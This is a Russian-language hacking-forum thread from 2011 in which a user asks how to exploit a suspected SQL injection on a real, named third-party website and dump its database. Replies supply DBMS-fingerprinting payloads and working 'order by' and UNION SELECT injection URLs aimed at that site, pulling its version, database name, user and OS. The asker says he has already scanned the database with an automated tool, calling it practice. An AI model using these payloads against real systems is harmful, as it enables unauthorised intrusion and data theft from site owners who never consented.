08.06.2011, 18:01
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
2 вопроса:
1 - имеется сайт, в нем Возможно есть sql inj
пишу в урл 49-1 возвращается 48 страница при написании ' выводится пустая страница
как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
|
|
|
08.06.2011, 18:47
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от foozzi
2 вопроса:
1 - имеется сайт, в нем
Возможно
есть sql inj
пишу в урл 49-1 возвращается 48 страница при написании
'
выводится пустая страница
как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
1. Если параметр полностью передаться в базу, то как обычно. Обычно числовые параметры не обрамляются кавычками, из за этого при проведении инъекции возможно исключить этот символ. Если нет - выложи линк. Всё надо смотреть, так же возможно из переменной удаляются символы(A-Za-z), специальные функции - здесь телепатов нет.
2. Встроенными функциями, синтаксисом подзапросов, сравнения - потом БД гораздо больше.
|
|
|
|
08.06.2011, 19:08
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от foozzi
как осуществить подсчет полей и дамп базы в таких условиях?
"id=48 order by 1" например так.
p.s.: давай ссылку. это тебе не фиши по факингу
|
|
|
|
08.06.2011, 19:09
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от foozzi
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
Код:
id=1+procedure+analyse()
id=1+and+concat_ws(1)=1
id=1+and+connection_id()=connection_id()
MSSQL
Код:
id=1+and+len(@@version)=len(@@version)
id=1+and+(@@TEXTSIZE>@@LANGID)
PostgerSQL
Код:
id=1+and+1=1::int
id=1+and+pg_backend_pid()=pg_backend_pid()
id=1+and+5432=inet_server_port()
Access
Код:
id=1+and+1=StrConv(1,1)
id=1+and+Sgn(1)=Sgn(1)
Oracle
Код:
id=1+and+to_char(22)=to_char(2)||to_char(2)
id=1+and+instr4(1,1,1,1)=1
id=1+and+rownum=rownum
Взято отсюда: https://rdot.org/forum/showpost.php?p=695&postcount=1
|
|
|
|
08.06.2011, 19:53
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от M_script
"id=48 order by 1" например так.
p.s.: давай ссылку. это тебе не фиши по факингу
вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49
(практикуюсь)
|
|
|
|
08.06.2011, 20:07
|
|
Постоянный
Регистрация: 29.02.2008
Сообщений: 935
С нами:
9577766
Репутация:
1914
|
|
Сообщение от foozzi
вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49
(практикуюсь)
Код:
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -
Код:
http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
вывод внизу
|
|
|
|
08.06.2011, 20:34
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от AlexV
Код:
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -
Код:
http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
вывод внизу Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?
|
|
|
|
08.06.2011, 20:35
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от foozzi
Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64+--+
Сейчас видишь?
В админку все равно не попасть
|
|
|
|
08.06.2011, 20:39
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
http://h1813090.stratoserver.net/files/share/8_6_2011/sraB8DgFlEWFYHrOQR1opw.jpg
знаю я sqlhelperom уже просканил базу там даж паролей нет, просто руками же интересней
|
|
|
|
08.06.2011, 20:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
ты пробелы удали из урла
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
